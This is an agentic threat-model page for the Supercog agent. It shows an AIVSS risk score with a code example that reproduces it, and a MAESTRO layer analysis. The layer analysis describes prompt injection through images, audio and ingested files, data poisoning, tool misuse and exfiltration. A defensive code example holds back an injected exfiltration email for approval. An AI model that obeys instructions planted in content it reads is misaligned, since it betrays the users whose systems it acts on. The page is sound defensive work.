
Supercog — agentic threat model

AIVSS 9.6 · Critical

Supercog scores as a critical agentic risk because its public listing describes an agent that connects to arbitrary enterprise systems, reads any file type, and takes actions on behalf of users, while mentioning no explicit security controls or sandboxing for any of those capabilities.

OWASP AIVSS score rationale

AIVSS = (CVSS_Base + AARS) × Mitigation_Factor, where AARS = (10 − CVSS_Base) × (Factor_Sum / 10) × ThM
CVSS base: 8.8
AARS uplift: 0.77
Factor sum: 5.8 / 10
Threat multiplier (ThM): ×1.1
Mitigation factor: ×1.0

Agentic risk factors (each scored 0.0 to 1.0):

Autonomy of Action          0.80
Goal-Driven Planning        0.70
Self-Modification           0.10
Dynamic Tool Use            0.90
Persistent Memory           0.40
Contextual Awareness        0.80
Dynamic Identity            0.60
Multi-Agent Interactions    0.20
Non-Determinism             0.70
Opacity & Reflexivity       0.60

Scored with the canonical OWASP AIVSS formula (AIVSS calculator reference); agentic risk factors estimated from the agent’s described capabilities.
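The formula above carried through with the factor values printed for Supercog, as an added example. This is not the OWASP reference calculator and not Supercog's code; it reproduces the page's 5.8 / 0.77 / 9.6 figures and, as an assumption, maps the score onto the CVSS v3.x qualitative bands, which is consistent with the page labelling 9.6 as Critical. The alternative mitigation factor in the final call is illustrative only; the listing gives no basis for a value other than 1.0.

```python
"""AIVSS calculator, added as a worked example of the formula on this page.
Not the OWASP reference calculator and not Supercog's code; the factor values
are the ones the listing prints for Supercog."""

# Agentic risk factor values the listing assigns to Supercog (each 0.0 to 1.0).
SUPERCOG_FACTORS = {
    "Autonomy of Action": 0.80,
    "Goal-Driven Planning": 0.70,
    "Self-Modification": 0.10,
    "Dynamic Tool Use": 0.90,
    "Persistent Memory": 0.40,
    "Contextual Awareness": 0.80,
    "Dynamic Identity": 0.60,
    "Multi-Agent Interactions": 0.20,
    "Non-Determinism": 0.70,
    "Opacity & Reflexivity": 0.60,
}
SUPERCOG_CVSS_BASE = 8.8
SUPERCOG_THREAT_MULTIPLIER = 1.1
SUPERCOG_MITIGATION_FACTOR = 1.0


def factor_sum(factors):
    """Sum of the ten factor values; each must lie in [0, 1]."""
    if len(factors) != 10:
        raise ValueError("AIVSS uses exactly ten agentic risk factors")
    for name, value in factors.items():
        if not 0.0 <= value <= 1.0:
            raise ValueError(f"factor {name!r} out of range: {value}")
    return sum(factors.values())


def aars(cvss_base, factors, threat_multiplier):
    """Agentic uplift: (10 - CVSS_Base) * (Factor_Sum / 10) * ThM.
    It scales only the headroom above the CVSS base, so a 10.0 base gets no uplift."""
    if not 0.0 <= cvss_base <= 10.0:
        raise ValueError(f"CVSS base out of range: {cvss_base}")
    return (10.0 - cvss_base) * (factor_sum(factors) / 10.0) * threat_multiplier


def aivss(cvss_base, factors, threat_multiplier=1.0, mitigation_factor=1.0):
    """AIVSS = (CVSS_Base + AARS) * Mitigation_Factor, as printed on the page."""
    return (cvss_base + aars(cvss_base, factors, threat_multiplier)) * mitigation_factor


def severity(score):
    """Qualitative band. Assumed here to follow the CVSS v3.x bands."""
    if score >= 9.0:
        return "Critical"
    if score >= 7.0:
        return "High"
    if score >= 4.0:
        return "Medium"
    if score > 0.0:
        return "Low"
    return "None"


def score_supercog(mitigation_factor=SUPERCOG_MITIGATION_FACTOR):
    """Reproduce the page's numbers; pass a different mitigation factor to see
    how far documented controls would have to move the score."""
    uplift = aars(SUPERCOG_CVSS_BASE, SUPERCOG_FACTORS, SUPERCOG_THREAT_MULTIPLIER)
    total = aivss(SUPERCOG_CVSS_BASE, SUPERCOG_FACTORS,
                  SUPERCOG_THREAT_MULTIPLIER, mitigation_factor)
    return {
        "factor_sum": round(factor_sum(SUPERCOG_FACTORS), 1),
        "aars": round(uplift, 2),
        "aivss": round(total, 1),
        "severity": severity(round(total, 1)),
    }


if __name__ == "__main__":
    print(score_supercog())      # the listing's 5.8 / 0.77 / 9.6 / Critical
    print(score_supercog(0.8))   # illustrative: same agent with a 0.8 mitigation factor
```

Two properties of the formula are worth noticing from the code: the uplift is bounded by the headroom above the CVSS base, so an already-critical base leaves little room for the agentic factors to matter, and the mitigation factor multiplies the whole score, so it is the only term in this rationale that documented sandboxing or controls could actually move.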

MAESTRO 7-layer threat model

Per-layer threats for this agent. Layers tagged "not certain from listing" carry general, caveated commentary because the public description does not pin that layer down.

L1 · Foundation Models (✓ mapped)

Supports all leading multi-modal LLMs (text, vision, audio, video). The primary threat is multi-modal prompt injection (e.g., malicious instructions embedded in images, audio, or files) leading to model reprogramming and unauthorized tool execution.

L2 · Data Operations (✓ mapped)

Processes 'any kind of file' and connects to work systems. This introduces severe risks of data poisoning, indirect prompt injection via ingested documents, and unauthorized data exfiltration from connected databases or file repositories.

L3 · Agent Frameworks (✓ mapped)

Orchestrates actions across connected work systems. The main threat is tool misuse and insecure tool integration, where the agent is manipulated into executing unintended API calls or write actions on external systems.

L4 · Deployment & Infrastructure (⚠ not certain from listing)

Not certain from the listing — available as cloud-hosted or self-hosted, but details regarding container sandboxing for file processing, network isolation, or secure credential storage for system connectors are not specified.

L5 · Evaluation & Observability (⚠ not certain from listing)

Not certain from the listing — there is no mention of built-in guardrails, transaction monitoring, or execution logging to detect anomalous agent behavior or drift before actions are committed to external systems.

L6 · Security & Compliance (cross-cutting) (⚠ not certain from listing)

Not certain from the listing — although it acts on behalf of users across enterprise systems, the listing does not detail how the acting user's identity is propagated to connected systems, whether RBAC bounds what the agent may do for that user, or whether any compliance standard (e.g., SOC 2) is met.
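The controls the L3, L5 and L6 entries above say the listing does not describe (a gate on tool calls before they are committed, identity propagation with RBAC, and execution logging) fit into one small policy check, shown here as an added example. It is not Supercog's code; the tool names, roles and the provenance-tagging convention are hypothetical, and the sample calls are constructed to exercise each branch. The one design decision that matters is the third branch: a write action whose arguments trace back to ingested content is never committed automatically, which is the generic defence against the indirect prompt injection path described under L2.

```python
"""Tool-call policy gate: an added example of the guardrail, identity-propagation
and audit-logging controls the listing does not describe. Hypothetical tool names
and roles; not Supercog's code."""
import json
import time
from dataclasses import dataclass, asdict

# Hypothetical tool registry. Every tool the agent may call is classified by
# its effect on the external system; anything absent from it is denied outright.
TOOL_EFFECT = {
    "files.read": "read",
    "crm.search_contacts": "read",
    "crm.update_contact": "write",
    "mail.send": "write",
}

# Hypothetical RBAC: the tools each role of the acting user may invoke.
# The agent acts on behalf of a user, so that user's role bounds the agent.
ROLE_TOOLS = {
    "analyst": {"files.read", "crm.search_contacts"},
    "sales_admin": {"files.read", "crm.search_contacts", "crm.update_contact", "mail.send"},
}


@dataclass
class ToolCall:
    user: str           # principal the agent is acting for
    role: str           # that principal's role
    tool: str
    args: dict
    sources: frozenset  # provenance of the argument values: "user" or e.g. "document:<name>"


@dataclass
class Decision:
    allowed: bool         # commit the call now
    needs_approval: bool  # hold for a human before committing
    reason: str


def is_untrusted(source):
    """Only text the acting user typed is trusted. Ingested files, web pages,
    database rows and other agents' output are untrusted: they are the carriers
    of indirect prompt injection."""
    return source != "user"


def evaluate(call, audit_log):
    """Decide on one tool call and append a structured audit record."""
    effect = TOOL_EFFECT.get(call.tool)
    if effect is None:
        decision = Decision(False, False, "unknown tool")
    elif call.tool not in ROLE_TOOLS.get(call.role, set()):
        decision = Decision(False, False, f"role {call.role!r} may not call {call.tool}")
    elif effect == "write" and any(is_untrusted(s) for s in call.sources):
        decision = Decision(False, True, "write action derived from untrusted content")
    else:
        decision = Decision(True, False, "policy ok")
    audit_log.append(json.dumps({
        "ts": round(time.time(), 3),
        "user": call.user,
        "role": call.role,
        "tool": call.tool,
        "effect": effect,
        "args": call.args,
        "sources": sorted(call.sources),
        **asdict(decision),
    }, sort_keys=True))
    return decision


def run_scenario():
    """Constructed calls covering each branch; returns (decisions, audit_log)."""
    audit = []
    calls = [
        # 1. read-only call inside the role: allowed
        ToolCall("alice", "analyst", "files.read", {"path": "q3-notes.pdf"}, frozenset({"user"})),
        # 2. write tool outside the role: denied
        ToolCall("alice", "analyst", "mail.send", {"to": "cfo@example.com"}, frozenset({"user"})),
        # 3. write whose arguments the user typed: allowed and logged
        ToolCall("bob", "sales_admin", "crm.update_contact",
                 {"id": 42, "phone": "+1 555 0100"}, frozenset({"user"})),
        # 4. write whose recipient and body came out of an ingested PDF
        #    (the indirect prompt injection path): held for human approval
        ToolCall("bob", "sales_admin", "mail.send",
                 {"to": "attacker@example.net", "body": "forwarding the Q3 contact export"},
                 frozenset({"user", "document:q3-notes.pdf"})),
        # 5. tool not in the registry: denied
        ToolCall("bob", "sales_admin", "shell.exec", {"cmd": "id"}, frozenset({"user"})),
    ]
    return [evaluate(c, audit) for c in calls], audit


if __name__ == "__main__":
    decisions, audit = run_scenario()
    for line in audit:
        print(line)
```

The audit record is emitted for denied and held calls as well as allowed ones, since the denials are the signal a detection team wants when an ingested document starts steering the agent toward write actions. Provenance tagging of arguments is the part a real deployment has to supply; without it the third branch cannot fire, and the gate degrades to plain RBAC.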

L7 · Agent Ecosystem (⚠ not certain from listing)

Not certain from the listing — there is no explicit mention of multi-agent collaboration or marketplace integrations, though its extensibility suggests potential for custom agent-to-agent workflows.

MAESTRO — the 7-layer agentic threat-modeling framework (Cloud Security Alliance / Ken Huang).